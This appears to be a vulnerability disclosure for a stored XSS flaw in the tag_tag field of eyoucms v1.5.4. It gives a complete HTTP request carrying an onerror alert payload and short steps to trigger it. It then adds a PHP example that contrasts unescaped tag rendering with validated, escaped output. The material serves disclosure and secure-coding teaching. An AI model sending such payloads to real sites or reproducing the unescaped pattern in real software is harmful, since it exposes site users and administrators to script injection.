wkstestete committed on 2023-03-21 07:41 . update xss/Eyoucms xss2.md.

eyoucms v1.5.4 tag_tag parameter has a stored XSS vulnerability

```http
POST /login.php?m=admin&c=Tags&a=edit&_ajax=1&lang=cn HTTP/1.1
Host: www.eyou.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 181
Origin: http://www.eyou.com
Connection: close
Referer: http://www.eyou.com/login.php?m=admin&c=Tags&a=edit&id=51&lang=cn
Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=kc2ot9hcf8c1685heb8bt7k1n0; users_id=1; workspaceParam=switch_map%7CIndex; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_IS_UPHTML=0
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

id=51&tag_tag=%3Cimg+src%3D1+onerror%3Dalert(1)%3E&tag_tagold=%3Cimg+src%3D1+onerror%3Dalert(1)%3E&litpic_local=&litpic_remote=&tag_seo_title=&tag_seo_keywords=&tag_seo_description=
```

Add a tag (the request above submits the payload in the tag_tag field).

Click on the association to trigger the XSS.
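The root cause is a stored tag name being emitted into HTML without encoding. The following is an added example written for this page, not Eyoucms code: `validateTagName()` and the two `renderTag*()` functions are hypothetical helpers that contrast the vulnerable pattern with the hardened one, using only standard PHP functions.

```php
<?php
// Added example, not Eyoucms code. validateTagName(), renderTagVulnerable()
// and renderTagSafe() are hypothetical helpers; the allow-list is an assumption.
declare(strict_types=1);

// Input-side control: tags are short labels, so an allow-list of letters,
// digits, spaces and a few separators is reasonable. No '<', '>', quotes or '&'.
function validateTagName(string $tag): bool
{
    $tag = trim($tag);
    if ($tag === '' || mb_strlen($tag, 'UTF-8') > 64) {
        return false;
    }
    // \p{L} covers CJK and Latin letters, \p{N} digits; the /u flag enables UTF-8.
    return preg_match('/^[\p{L}\p{N} _\-.]+$/u', $tag) === 1;
}

// Output-side control: this is the fix that holds even if validation is
// bypassed, because the stored value is always treated as text, never markup.
function escapeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable rendering: the raw stored value is concatenated into the page,
// so an onerror handler inside the tag name executes when the link is shown.
function renderTagVulnerable(string $storedTag): string
{
    return '<a href="/tags/' . rawurlencode($storedTag) . '">' . $storedTag . '</a>';
}

// Hardened rendering: each interpolation is encoded for its own context
// (URL path segment for the href, HTML text for the link body).
function renderTagSafe(string $storedTag): string
{
    return '<a href="/tags/' . rawurlencode($storedTag) . '">' . escapeForHtml($storedTag) . '</a>';
}

// Constructed sample input: the tag_tag value from the request above, URL-decoded.
$payload = '<img src=1 onerror=alert(1)>';

// Rejected at input because it contains '<' and '>'.
var_dump(validateTagName($payload));
// Markup survives into the page.
echo renderTagVulnerable($payload), PHP_EOL;
// Angle brackets are entity-encoded, so the browser renders the payload as text.
echo renderTagSafe($payload), PHP_EOL;
// An ordinary tag passes validation.
var_dump(validateTagName('security news'));
```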
